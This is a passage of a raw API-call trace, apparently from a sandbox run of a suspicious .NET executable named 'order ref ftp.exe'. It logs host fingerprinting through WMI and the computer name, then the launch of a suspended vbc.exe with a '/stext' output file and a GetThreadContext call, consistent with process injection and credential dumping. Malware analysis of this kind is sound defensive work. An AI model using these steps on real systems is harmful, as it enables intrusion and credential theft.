ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef34*=0x15, pszText=0x0) returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.341] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.341] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.341] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef34*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.341] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.341] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.341] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x12b3f50) returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef0c | out: puCount=0xf2ef0c*=0x2) returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.341] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.341] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.341] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef08*=0x15, pszText=0x0) returned 0x0 [0065.341] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.341] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.341] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.341] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.342] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.342] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef08*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.342] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.342] IWbemClassObject:Get (in: This=0x12b24a0, wszName="MacAddress", lFlags=0, pVal=0xf2eec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327bafc*=0, plFlavor=0x327bb00*=0 | out: pVal=0xf2eec8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327bafc*=8, plFlavor=0x327bb00*=32) returned 0x0 [0065.342] IWbemClassObject:Get (in: This=0x12b24a0, wszName="MacAddress", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327bafc*=8, plFlavor=0x327bb00*=32 | out: pVal=0xf2eecc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327bafc*=8, plFlavor=0x327bb00*=32) returned 0x0 [0065.342] CoGetContextToken (in: pToken=0xf2ecbc | out: pToken=0xf2ecbc) returned 0x0 [0065.342] IUnknown:AddRef (This=0x12b85b8) returned 0x3 [0065.342] IEnumWbemClassObject:Next (in: This=0x12b85b8, lTimeout=-1, uCount=0x1, apObjects=0x1271d78, puReturned=0x327a99c | out: apObjects=0x1271d78*=0x0, puReturned=0x327a99c*=0x0) returned 0x1 [0065.342] IUnknown:Release (This=0x12b85b8) returned 0x2 [0065.343] CoGetContextToken (in: pToken=0xf2ee08 | out: pToken=0xf2ee08) returned 0x0 [0065.343] WbemLocator:IUnknown:Release (This=0x12b5240) returned 0x1 [0065.343] IUnknown:Release (This=0x12b85b8) returned 0x0 [0065.344] GetComputerNameW (in: lpBuffer=0x1271d60, nSize=0xf2efac | out: lpBuffer="LHNIWSJ", nSize=0xf2efac) returned 1 [0065.344] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424 [0065.344] GetLastError () returned 0x0 [0065.344] SetEvent (hEvent=0x2b4) returned 1 [0065.344] GetLastError () returned 0x0 [0065.344] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xf2eef0*=0x424, lpdwindex=0xf2eca8 | out: lpdwindex=0xf2eca8) returned 0x0 [0065.346] CoGetContextToken (in: pToken=0xf2ed40 | out: pToken=0xf2ed40) returned 0x0 [0065.346] CoGetContextToken (in: pToken=0xf2ed00 | out: pToken=0xf2ed00) returned 0x0 [0065.346] WbemDefPath:IUnknown:AddRef (This=0x12b4650) returned 0x2 [0065.346] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b4650, riid=0xf2ed7c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed78 | out: ppvObject=0xf2ed78*=0x12b4650) returned 0x0 [0065.346] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x2 [0065.346] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x1 [0065.347] CoGetContextToken (in: pToken=0xf2edc0 | out: pToken=0xf2edc0) returned 0x0 [0065.347] CoGetContextToken (in: pToken=0xf2ed80 | out: pToken=0xf2ed80) returned 0x0 [0065.347] WbemDefPath:IUnknown:AddRef (This=0x12b4650) returned 0x2 [0065.347] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b4650, riid=0xf2edfc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edf8 | out: ppvObject=0xf2edf8*=0x12b4650) returned 0x0 [0065.347] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x2 [0065.347] WbemDefPath:IWbemPath:SetText (This=0x12b4650, uMode=0x4, pszPath="\\\\LHNIWSJ\\root\\WHERE DeviceID='C:'") returned 0x80041008 [0065.347] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x1 [0065.348] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0xf2eea8 | out: pperrinfo=0xf2eea8*=0x0) returned 0x1 [0065.348] IIDFromString (in: lpsz="{EB87E1BD-3233-11D2-AEC9-00C04FB68820}", lpiid=0xf2ee00 | out: lpiid=0xf2ee00) returned 0x0 [0065.349] CoGetClassObject (in: rclsid=0x12aa854*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), dwClsContext=0x15, pvReserved=0x0, riid=0x742d9630*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xf2ed68 | out: ppv=0xf2ed68*=0x12b7558) returned 0x0 [0065.349] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x12b7558, riid=0x744097d4*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2eb98 | out: ppvObject=0xf2eb98*=0x0) returned 0x80004002 [0065.349] WbemStatusCodeText:IClassFactory:CreateInstance (in: This=0x12b7558, pUnkOuter=0x0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2ebd0 | out: ppvObject=0xf2ebd0*=0x12b74c8) returned 0x0 [0065.349] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x12b74c8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e974 | out: ppvObject=0xf2e974*=0x12b74c8) returned 0x0 [0065.349] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x12b74c8, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e930 | out: ppvObject=0xf2e930*=0x0) returned 0x80004002 [0065.349] WbemStatusCodeText:IUnknown:AddRef (This=0x12b74c8) returned 0x3 [0065.350] CoGetContextToken (in: pToken=0xf2e7bc | out: pToken=0xf2e7bc) returned 0x0 [0065.350] CoGetContextToken (in: pToken=0xf2e780 | out: pToken=0xf2e780) returned 0x0 [0065.350] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e7b4 | out: ppvObject=0xf2e7b4*=0x126b49c) returned 0x0 [0065.350] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e7e4 | out: pAptType=0xf2e7e4*=3) returned 0x0 [0065.350] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.350] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x12b74c8, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e7a4 | out: ppvObject=0xf2e7a4*=0x0) returned 0x80004002 [0065.350] CoGetContextToken (in: pToken=0xf2e7b4 | out: pToken=0xf2e7b4) returned 0x0 [0065.350] WbemStatusCodeText:IUnknown:AddRef (This=0x12b74c8) returned 0x4 [0065.350] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x12b74c8, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e828 | out: ppvObject=0xf2e828*=0x0) returned 0x80004002 [0065.350] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x3 [0065.350] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x2 [0065.350] WbemStatusCodeText:IUnknown:Release (This=0x12b7558) returned 0x0 [0065.350] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x1 [0065.350] CoGetContextToken (in: pToken=0xf2ecc0 | out: pToken=0xf2ecc0) returned 0x0 [0065.350] CoGetContextToken (in: pToken=0xf2ec80 | out: pToken=0xf2ec80) returned 0x0 [0065.350] WbemStatusCodeText:IUnknown:AddRef (This=0x12b74c8) returned 0x2 [0065.350] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x12b74c8, riid=0xf2ecfc*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0xf2ecf8 | out: ppvObject=0xf2ecf8*=0x12b74c8) returned 0x0 [0065.351] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x2 [0065.351] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x1 [0065.353] CoGetContextToken (in: pToken=0xf2ec8c | out: pToken=0xf2ec8c) returned 0x0 [0065.353] CoGetContextToken (in: pToken=0xf2ec4c | out: pToken=0xf2ec4c) returned 0x0 [0065.353] WbemStatusCodeText:IUnknown:AddRef (This=0x12b74c8) returned 0x2 [0065.353] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x12b74c8, riid=0xf2ecc8*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0xf2ecc4 | out: ppvObject=0xf2ecc4*=0x12b74c8) returned 0x0 [0065.353] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x2 [0065.353] WbemStatusCodeText:IUnknown:AddRef (This=0x12b74c8) returned 0x3 [0065.353] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x12b74c8, hRes=0x80041008, LocaleId=0x0, lFlags=1, MessageText=0xf2edfc | out: MessageText=0xf2edfc*="Invalid parameter ") returned 0x0 [0065.387] SysStringByteLen (bstr="Invalid parameter ") returned 0x24 [0065.387] SysStringByteLen (bstr="Invalid parameter ") returned 0x24 [0065.387] WbemStatusCodeText:IUnknown:Release (This=0x12b74c8) returned 0x2 [0065.418] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\877de498-eb87-4352-dee0-40eac252a007", nBufferLength=0x105, lpBuffer=0xf2eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\877de498-eb87-4352-dee0-40eac252a007", lpFilePart=0x0) returned 0x4d [0065.418] GetLastError () returned 0x0 [0065.418] GetVersionExW (in: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0065.418] GetLastError () returned 0x0 [0065.419] SetErrorMode (uMode=0x1) returned 0x0 [0065.420] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\877de498-eb87-4352-dee0-40eac252a007" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\877de498-eb87-4352-dee0-40eac252a007"), fInfoLevelId=0x0, lpFileInformation=0xf2effc | out: lpFileInformation=0xf2effc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0065.421] GetLastError () returned 0x2 [0065.421] SetErrorMode (uMode=0x0) returned 0x1 [0065.421] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", nBufferLength=0x105, lpBuffer=0xf2eb20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", lpFilePart=0x0) returned 0x2f [0065.421] GetLastError () returned 0x2 [0065.566] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\877de498-eb87-4352-dee0-40eac252a007", nBufferLength=0x105, lpBuffer=0xf2ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\877de498-eb87-4352-dee0-40eac252a007", lpFilePart=0x0) returned 0x4d [0065.566] GetLastError () returned 0x2 [0065.566] SetErrorMode (uMode=0x1) returned 0x0 [0065.568] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\877de498-eb87-4352-dee0-40eac252a007" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\877de498-eb87-4352-dee0-40eac252a007"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x42c [0065.568] GetLastError () returned 0x0 [0065.569] GetFileType (hFile=0x42c) returned 0x1 [0065.569] SetErrorMode (uMode=0x0) returned 0x1 [0065.569] GetFileType (hFile=0x42c) returned 0x1 [0065.571] WriteFile (in: hFile=0x42c, lpBuffer=0x3308340*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0xf2ef68, lpOverlapped=0x0 | out: lpBuffer=0x3308340*, lpNumberOfBytesWritten=0xf2ef68*=0x40, lpOverlapped=0x0) returned 1 [0065.571] GetLastError () returned 0x0 [0065.571] CloseHandle (hObject=0x42c) returned 1 [0065.573] GetLastError () returned 0x0 [0065.804] GetModuleHandleW (lpModuleName="user32.dll") returned 0x74ad0000 [0065.806] GetProcAddress (hModule=0x74ad0000, lpProcName="DefWindowProcW") returned 0x77a0caa0 [0065.807] GetStockObject (i=5) returned 0x1900015 [0065.807] GetLastError () returned 0x0 [0065.808] GetModuleHandleW (lpModuleName=0x0) returned 0xd10000 [0065.813] CoTaskMemAlloc (cb=0x4c) returned 0x129cce0 [0065.813] RegisterClassW (lpWndClass=0x1271d78) returned 0xc16c [0065.813] GetLastError () returned 0x0 [0065.813] CoTaskMemFree (pv=0x129cce0) [0065.813] GetModuleHandleW (lpModuleName=0x0) returned 0xd10000 [0065.815] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.0.app.0.378734a", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xd10000, lpParam=0x0) returned 0x80084 [0065.816] SetWindowLongW (hWnd=0x80084, nIndex=-4, dwNewLong=2007026336) returned 48696170 [0065.817] GetWindowLongW (hWnd=0x80084, nIndex=-4) returned 2007026336 [0065.819] GetCurrentProcess () returned 0xffffffff [0065.819] GetCurrentThread () returned 0xfffffffe [0065.819] GetCurrentProcess () returned 0xffffffff [0065.819] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xf2e7a4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xf2e7a4*=0x42c) returned 1 [0065.819] GetLastError () returned 0x0 [0065.821] GetCurrentThreadId () returned 0xfd0 [0065.831] lstrlenW (lpString="䅁") returned 1 [0065.834] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2e710 | out: phkResult=0xf2e710*=0x438) returned 0x0 [0065.835] RegQueryValueExW (in: hKey=0x438, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0xf2e758, lpData=0x0, lpcbData=0xf2e754*=0x0 | out: lpType=0xf2e758*=0x0, lpData=0x0, lpcbData=0xf2e754*=0x0) returned 0x2 [0065.835] RegQueryValueExW (in: hKey=0x438, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0xf2e758, lpData=0x0, lpcbData=0xf2e754*=0x0 | out: lpType=0xf2e758*=0x0, lpData=0x0, lpcbData=0xf2e754*=0x0) returned 0x2 [0065.835] RegCloseKey (hKey=0x438) returned 0x0 [0065.836] SetWindowLongW (hWnd=0x80084, nIndex=-4, dwNewLong=48696466) returned 2007026336 [0065.837] GetWindowLongW (hWnd=0x80084, nIndex=-4) returned 48696466 [0065.837] GetWindowLongW (hWnd=0x80084, nIndex=-16) returned 79691776 [0065.879] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x80084, Msg=0x24, wParam=0x0, lParam=0xf2ea2c) returned 0x0 [0065.879] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc167 [0065.880] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x80084, Msg=0x81, wParam=0x0, lParam=0xf2ea20) returned 0x1 [0065.882] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x80084, Msg=0x83, wParam=0x0, lParam=0xf2ea0c) returned 0x0 [0065.981] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x80084, Msg=0x1, wParam=0x0, lParam=0xf2ea20) returned 0x0 [0065.981] GetLastError () returned 0x0 [0066.133] GetModuleHandleW (lpModuleName=0x0) returned 0xd10000 [0066.133] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.0.app.0.378734a", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xd10000, lpParam=0x0) returned 0x8003a [0066.133] SetWindowLongW (hWnd=0x8003a, nIndex=-4, dwNewLong=2007026336) returned 48696170 [0066.133] GetWindowLongW (hWnd=0x8003a, nIndex=-4) returned 2007026336 [0066.133] SetWindowLongW (hWnd=0x8003a, nIndex=-4, dwNewLong=48696514) returned 2007026336 [0066.134] GetWindowLongW (hWnd=0x8003a, nIndex=-4) returned 48696514 [0066.134] GetWindowLongW (hWnd=0x8003a, nIndex=-16) returned 79691776 [0066.134] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x8003a, Msg=0x24, wParam=0x0, lParam=0xf2ea2c) returned 0x0 [0066.134] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x8003a, Msg=0x81, wParam=0x0, lParam=0xf2ea20) returned 0x1 [0066.134] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x8003a, Msg=0x83, wParam=0x0, lParam=0xf2ea0c) returned 0x0 [0066.135] CallWindowProcW (lpPrevWndFunc=0x77a0caa0, hWnd=0x8003a, Msg=0x1, wParam=0x0, lParam=0xf2ea20) returned 0x0 [0066.135] GetLastError () returned 0x0 [0066.194] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", nBufferLength=0x105, lpBuffer=0xf2e9f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", lpFilePart=0x0) returned 0x32 [0066.194] GetLastError () returned 0x0 [0066.194] SetErrorMode (uMode=0x1) returned 0x0 [0066.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.config"), fInfoLevelId=0x0, lpFileInformation=0xf2ee9c | out: lpFileInformation=0xf2ee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0066.194] GetLastError () returned 0x2 [0066.194] SetErrorMode (uMode=0x0) returned 0x1 [0066.404] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1271d60 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0066.404] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIIHMN~1\\", lpszLongPath=0xf2eaec, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\CIiHmnxMn6Ps\\") returned 0x16 [0066.404] GetLastError () returned 0x3 [0066.404] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0xf2eb14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29 [0066.404] GetLastError () returned 0x3 [0066.404] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0xf2eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29 [0066.404] GetLastError () returned 0x3 [0066.405] GetTempFileNameW (in: lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x1271d60 | out: lpTempFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp")) returned 0x3b59 [0066.406] GetLastError () returned 0x0 [0066.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xf2ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0066.414] GetLastError () returned 0x3f0 [0066.468] CreateProcessW (in: lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe", lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1271d60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf2ef20 | out: lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp\"", lpProcessInformation=0xf2ef20*(hProcess=0x44c, hThread=0x448, dwProcessId=0xc54, dwThreadId=0xce8)) returned 1 [0066.706] GetThreadContext (in: hThread=0x448, lpContext=0x331c81c | out: lpContext=0x331c81c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, 